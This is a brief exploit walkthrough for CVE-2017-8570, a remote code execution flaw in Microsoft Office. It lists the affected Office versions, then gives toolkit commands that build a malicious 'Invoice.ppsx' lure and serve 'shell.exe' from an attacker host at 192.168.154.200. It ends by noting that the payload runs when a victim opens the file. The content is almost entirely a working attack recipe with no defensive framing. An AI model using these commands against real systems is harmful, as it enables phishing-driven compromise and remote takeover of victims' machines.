Script Moniker Remote Code Execution Vulnerability
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
Create the malicious document
# python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.154.200/logo.doc
Generated Invoice.ppsx successfully
Start the HTTP service, listening on the specified port
python cve-2017-8570_toolkit.py -M exp -e http://192.168.154.200/shell.exe -l /tmp/shell.exe
When the victim opens Invoice.ppsx, shell.exe is executed, but a CMD window flashes briefly